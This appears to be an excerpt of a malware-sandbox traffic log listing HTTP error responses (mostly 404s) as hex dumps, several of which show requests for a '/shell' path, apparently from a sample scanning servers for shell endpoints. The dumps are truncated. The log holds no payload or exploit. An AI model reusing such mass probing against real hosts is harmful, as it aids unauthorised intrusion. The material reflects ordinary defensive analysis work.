Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:32 GMTServer: ApacheContent-Length: 196Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Mon, 01 Nov 2021 09:09:31 GMTContent-Length: 4880Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Server: BitNinja Captcha ServerDate: Mon, 01 Nov 2021 09:09:33 GMTContent-Length: 13724Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 57 61 69 74 69 6e 67 20 66 6f 72 20 74 68 65 20 72 65 64 69 72 65 63 74 69 72 6f 6e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Mon, 01 Nov 2021 09:09:34 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 979Date: Mon, 01 Nov 2021 09:09:34 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 36 38 20 28 55 62 75 6e 74 75 29 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 73 68 65 6c 6c 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 73 68 65 6c 6c 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:34 GMTServer: Apache/2.4.48 (Ubuntu)Content-Length: 271Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.48 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: mini_httpd/1.19 19dec2003Date: Mon, 01 Nov 2021 09:09:37 GMTCache-Control: no-cache,no-storeContent-Type: text/html; charset=%sConnection: closeData Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 6e 69 5f 68 74 74 70 64 2f 22 3e 6d 69 6e 69 5f 68 74 74 70 64 2f 31 2e 31 39 20 31 39 64 65 63 32 30 30 33 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/mini_httpd/">mini_httpd/1.19 19dec2003</A></ADDRESS></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 04:09:37 GMTX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockContent-Length: 181Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=8, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6c 6f 63 61 74 65 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 73 68 65 6c 6c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't locate document: /shell</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:09:38 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 06:09:37 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-AspNet-Version: 4.0.30319X-Powered-By: ASP.NETDate: Mon, 01 Nov 2021 09:09:38 GMTContent-Length: 3257Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 37 65 6d 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 0d 0a 20 20 20 20 20 20 20 20 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 35 70 78 7d 0d 0a 20 20 20 20 20 20 20 20 20 62 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 35 70 78 7d 0d 0a 20 20 20 20 20 20 20 20 20 48 31 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 74 3b 63 6f 6c 6f 72 3a 72 65 64 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 48 32 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 74 3b 63 6f 6c 6f 72 3a 6d 61 72 6f 6f 6e 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 70 72 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 43 6f 6e 73 6f 6c 61 73 22 2c 22 4c 75 63 69 64 61 20 43 6f 6e 73 6f 6c 65 22 2c 4d 6f 6e 6f 73 70 61 63 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 74 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 2e 35 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 34 70 74 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 6d 61 72 6b 65 72 20 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 76 65 72 73 69 6f 6e 20 7b 63 6f 6c 6f 72 3a 20 67 72 61 79 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72 20 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 65 78 70 61 6e 64 61 62 6c 65 20 7b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 20 66 6f 6e 74 2d 77 65
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1566Date: Mon, 01 Nov 2021 09:09:41 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 